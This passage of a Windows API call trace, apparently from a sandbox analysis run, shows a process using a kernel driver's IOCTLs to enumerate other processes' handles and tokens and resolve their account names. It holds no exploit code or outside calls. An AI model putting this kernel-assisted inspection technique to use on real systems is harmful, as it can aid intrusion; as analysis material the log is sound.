| out: Object=0xfffff88005163548*=0xfffffa800254c070, HandleInformation=0x0) returned 0x0 [0162.123] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0162.125] PsReleaseProcessExitSynchronization () returned 0x2 [0162.125] ObfDereferenceObject (Object=0xfffffa800207b530) returned 0x12 [0162.125] ObQueryNameString (in: Object=0xfffffa8007bffb50, ObjectNameInfo=0xfffffa80022da044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80022da044, ReturnLength=0xfffff88005163508) returned 0x0 [0162.125] ObfDereferenceObject (Object=0xfffffa800254c070) returned 0x3 [0162.125] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.125] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.125] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0162.125] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x2e, lpOverlapped=0x0) returned 1 [0162.125] PsLookupProcessByProcessId (in: ProcessId=0x1c4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0162.125] PsAcquireProcessExitSynchronization () returned 0x0 [0162.125] KeStackAttachProcess (in: PROCESS=0xfffffa800207b530, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800207b530, ApcState=0xfffff880051635d0) [0162.126] ObReferenceObjectByHandle (in: Handle=0x78, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002142a90, HandleInformation=0x0) returned 0x0 [0162.126] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0162.126] PsReleaseProcessExitSynchronization () returned 0x2 [0162.126] ObfDereferenceObject (Object=0xfffffa800207b530) returned 0x12 [0162.126] ObQueryNameString (in: Object=0xfffffa8007bffb50, ObjectNameInfo=0xfffffa80022db044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80022db044, ReturnLength=0xfffff88005163508) returned 0x0 [0162.126] ObfDereferenceObject (Object=0xfffffa8002142a90) returned 0x1 [0162.126] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.126] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.126] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0xc8 [0162.126] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0162.126] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa80021bb5c0, HandleInformation=0x0) returned 0x0 [0162.126] ObOpenObjectByPointer (in: Object=0xfffffa80021bb5c0, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff8000087c) returned 0x0 [0162.127] ObfDereferenceObject (Object=0xfffffa80021bb5c0) returned 0x29 [0162.127] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000087c, DesiredAccess=0x8, TokenHandle=0xfffffa80024ccb80 | out: TokenHandle=0xfffffa80024ccb80*=0xc4) returned 0x0 [0162.127] ZwClose (Handle=0xffffffff8000087c) returned 0x0 [0162.127] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.127] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0162.127] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0162.130] CloseHandle (hObject=0xc4) returned 1 [0162.130] CloseHandle (hObject=0xc8) returned 1 [0162.130] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0162.130] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0162.131] PsLookupProcessByProcessId (in: ProcessId=0xae0, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0162.131] PsAcquireProcessExitSynchronization () returned 0x0 [0162.131] KeStackAttachProcess (in: PROCESS=0xfffffa80021bb5c0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80021bb5c0, ApcState=0xfffff880051635d0) [0162.131] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800204a290, HandleInformation=0x0) returned 0x0 [0162.131] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0162.131] PsReleaseProcessExitSynchronization () returned 0x2 [0162.131] ObfDereferenceObject (Object=0xfffffa80021bb5c0) returned 0x27 [0162.131] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002ff5044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002ff5044, ReturnLength=0xfffff88005163508) returned 0x0 [0162.131] ObfDereferenceObject (Object=0xfffffa800204a290) returned 0x1 [0162.131] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.132] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.132] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0162.132] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x86, lpOverlapped=0x0) returned 1 [0162.132] PsLookupProcessByProcessId (in: ProcessId=0xae0, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0162.132] PsAcquireProcessExitSynchronization () returned 0x0 [0162.132] KeStackAttachProcess (in: PROCESS=0xfffffa80021bb5c0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80021bb5c0, ApcState=0xfffff880051635d0) [0162.132] ObReferenceObjectByHandle (in: Handle=0x24, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f72430, HandleInformation=0x0) returned 0x0 [0162.132] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0162.132] PsReleaseProcessExitSynchronization () returned 0x2 [0162.133] ObfDereferenceObject (Object=0xfffffa80021bb5c0) returned 0x27 [0162.133] ObQueryNameString (in: Object=0xfffffa8001f72430, ObjectNameInfo=0xfffffa8003206044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8003206044, ReturnLength=0xfffff88005163550) returned 0x0 [0162.133] ObfDereferenceObject (Object=0xfffffa8001f72430) returned 0x1 [0162.133] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.133] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.133] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0162.133] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0162.133] PsLookupProcessByProcessId (in: ProcessId=0xae0, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0162.133] PsAcquireProcessExitSynchronization () returned 0x0 [0162.133] KeStackAttachProcess (in: PROCESS=0xfffffa80021bb5c0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80021bb5c0, ApcState=0xfffff880051635d0) [0162.134] ObReferenceObjectByHandle (in: Handle=0x78, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0162.134] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0162.134] PsReleaseProcessExitSynchronization () returned 0x2 [0162.134] ObfDereferenceObject (Object=0xfffffa80021bb5c0) returned 0x27 [0162.134] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa80030c1044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030c1044, ReturnLength=0xfffff88005163550) returned 0x0 [0162.134] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x53 [0162.134] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.134] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.134] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0162.134] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x74, lpOverlapped=0x0) returned 1 [0162.134] PsLookupProcessByProcessId (in: ProcessId=0xae0, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0162.134] PsAcquireProcessExitSynchronization () returned 0x0 [0162.135] KeStackAttachProcess (in: PROCESS=0xfffffa80021bb5c0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80021bb5c0, ApcState=0xfffff880051635d0) [0162.135] ObReferenceObjectByHandle (in: Handle=0xa4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002312dd0, HandleInformation=0x0) returned 0x0 [0162.135] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0162.135] PsReleaseProcessExitSynchronization () returned 0x2 [0162.135] ObfDereferenceObject (Object=0xfffffa80021bb5c0) returned 0x27 [0162.135] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80022d0044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80022d0044, ReturnLength=0xfffff88005163508) returned 0x0 [0162.135] ObfDereferenceObject (Object=0xfffffa8002312dd0) returned 0x1 [0162.135] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.135] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.135] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0162.135] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0162.136] PsLookupProcessByProcessId (in: ProcessId=0xae0, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0162.136] PsAcquireProcessExitSynchronization () returned 0x0 [0162.136] KeStackAttachProcess (in: PROCESS=0xfffffa80021bb5c0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80021bb5c0, ApcState=0xfffff880051635d0) [0162.136] ObReferenceObjectByHandle (in: Handle=0xa8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0014ceb10, HandleInformation=0x0) returned 0x0 [0162.136] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0162.136] PsReleaseProcessExitSynchronization () returned 0x2 [0162.136] ObfDereferenceObject (Object=0xfffffa80021bb5c0) returned 0x27 [0162.136] ObQueryNameString (in: Object=0xfffff8a0014ceb10, ObjectNameInfo=0xfffffa80022c17c4, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80022c17c4, ReturnLength=0xfffff88005163550) returned 0x0 [0162.136] ObfDereferenceObject (Object=0xfffff8a0014ceb10) returned 0x1 [0162.136] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.140] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.140] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0162.140] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0162.140] PsLookupProcessByProcessId (in: ProcessId=0xae0, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0162.140] PsAcquireProcessExitSynchronization () returned 0x0 [0162.140] KeStackAttachProcess (in: PROCESS=0xfffffa80021bb5c0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80021bb5c0, ApcState=0xfffff880051635d0) [0162.140] ObReferenceObjectByHandle (in: Handle=0xac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80023d1910, HandleInformation=0x0) returned 0x0 [0162.141] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0162.141] PsReleaseProcessExitSynchronization () returned 0x2 [0162.141] ObfDereferenceObject (Object=0xfffffa80021bb5c0) returned 0x27 [0162.141] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80022d7044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80022d7044, ReturnLength=0xfffff88005163508) returned 0x0 [0162.141] ObfDereferenceObject (Object=0xfffffa80023d1910) returned 0x1 [0162.141] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.141] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.141] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0162.141] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0162.141] PsLookupProcessByProcessId (in: ProcessId=0xae0, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0162.141] PsAcquireProcessExitSynchronization () returned 0x0 [0162.142] KeStackAttachProcess (in: PROCESS=0xfffffa80021bb5c0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80021bb5c0, ApcState=0xfffff880051635d0) [0162.142] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000fa9eb0, HandleInformation=0x0) returned 0x0 [0162.142] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0162.142] PsReleaseProcessExitSynchronization () returned 0x2 [0162.142] ObfDereferenceObject (Object=0xfffffa80021bb5c0) returned 0x27 [0162.142] ObQueryNameString (in: Object=0xfffff8a000fa9eb0, ObjectNameInfo=0xfffffa80022d6044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80022d6044, ReturnLength=0xfffff88005163550) returned 0x0 [0162.142] ObfDereferenceObject (Object=0xfffff8a000fa9eb0) returned 0xe [0162.142] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.142] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.142] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa74) returned 0xc8 [0162.142] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0162.142] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa8002345b30, HandleInformation=0x0) returned 0x0 [0162.142] ObOpenObjectByPointer (in: Object=0xfffffa8002345b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff8000087c) returned 0x0 [0162.142] ObfDereferenceObject (Object=0xfffffa8002345b30) returned 0x25 [0162.142] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000087c, DesiredAccess=0x8, TokenHandle=0xfffffa80024ccb80 | out: TokenHandle=0xfffffa80024ccb80*=0xc4) returned 0x0 [0162.143] ZwClose (Handle=0xffffffff8000087c) returned 0x0 [0162.143] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.143] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0162.143] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="LOCAL SERVICE", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0162.146] CloseHandle (hObject=0xc4) returned 1 [0162.146] CloseHandle (hObject=0xc8) returned 1 [0162.146] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0162.146] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0162.146] PsLookupProcessByProcessId (in: ProcessId=0xa74, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0162.146] PsAcquireProcessExitSynchronization () returned 0x0 [0162.147] KeStackAttachProcess (in: PROCESS=0xfffffa8002345b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002345b30, ApcState=0xfffff880051635d0) [0162.147] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80023a8670, HandleInformation=0x0) returned 0x0 [0162.147] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0162.147] PsReleaseProcessExitSynchronization () returned 0x2 [0162.147] ObfDereferenceObject (Object=0xfffffa8002345b30) returned 0x23 [0162.147] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80022d5044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80022d5044, ReturnLength=0xfffff88005163508) returned 0x0 [0162.147] ObfDereferenceObject (Object=0xfffffa80023a8670) returned 0x1 [0162.147] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.147] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.147] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0162.147] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0162.148] PsLookupProcessByProcessId (in: ProcessId=0xa74, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0162.148] PsAcquireProcessExitSynchronization () returned 0x0 [0162.148] KeStackAttachProcess (in: PROCESS=0xfffffa8002345b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002345b30, ApcState=0xfffff880051635d0) [0162.148] ObReferenceObjectByHandle (in: Handle=0x5c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80024d3bb0, HandleInformation=0x0) returned 0x0 [0162.148] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0162.148] PsReleaseProcessExitSynchronization () returned 0x2 [0162.148] ObfDereferenceObject (Object=0xfffffa8002345b30) returned 0x23 [0162.148] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa80022d4044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80022d4044, ReturnLength=0xfffff88005163508) returned 0x0 [0162.148] ObfDereferenceObject (Object=0xfffffa80024d3bb0) returned 0x1 [0162.148] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.148] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.148] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0162.148] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0xa2, lpOverlapped=0x0) returned 1 [0162.148] PsLookupProcessByProcessId (in: ProcessId=0xa74, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0162.148] PsAcquireProcessExitSynchronization () returned 0x0 [0162.148] KeStackAttachProcess (in: PROCESS=0xfffffa8002345b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002345b30, ApcState=0xfffff880051635d0) [0162.149] ObReferenceObjectByHandle (in: Handle=0xf8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800264ef20, HandleInformation=0x0) returned 0x0 [0162.149] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0162.149] PsReleaseProcessExitSynchronization () returned 0x2 [0162.149] ObfDereferenceObject (Object=0xfffffa8002345b30) returned 0x23 [0162.149] ObQueryNameString (in: Object=0xfffffa800264ef20, ObjectNameInfo=0xfffffa80022d3044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80022d3044, ReturnLength=0xfffff88005163550) returned 0x0 [0162.149] ObfDereferenceObject (Object=0xfffffa800264ef20) returned 0x3 [0162.149] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.149] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.149] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0162.149] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0162.149] PsLookupProcessByProcessId (in: ProcessId=0xa74, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0162.149] PsAcquireProcessExitSynchronization () returned 0x0 [0162.149] KeStackAttachProcess (in: PROCESS=0xfffffa8002345b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002345b30, ApcState=0xfffff880051635d0) [0162.150] ObReferenceObjectByHandle (in: Handle=0xfc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800264eac0, HandleInformation=0x0) returned 0x0 [0162.150] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0162.150] PsReleaseProcessExitSynchronization () returned 0x2 [0162.150] ObfDereferenceObject (Object=0xfffffa8002345b30) returned 0x23 [0162.150] ObQueryNameString (in: Object=0xfffffa800264eac0, ObjectNameInfo=0xfffffa80022d1044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80022d1044, ReturnLength=0xfffff88005163550) returned 0x0 [0162.150] ObfDereferenceObject (Object=0xfffffa800264eac0) returned 0x3 [0162.150] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.150] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.150] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6c8) returned 0x0 [0162.150] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0162.150] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x2d1b30, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0162.150] PsLookupProcessByProcessId (in: ProcessId=0x6c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0xc000000b [0162.150] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.151] HeapFree (in: hHeap=0x290000, 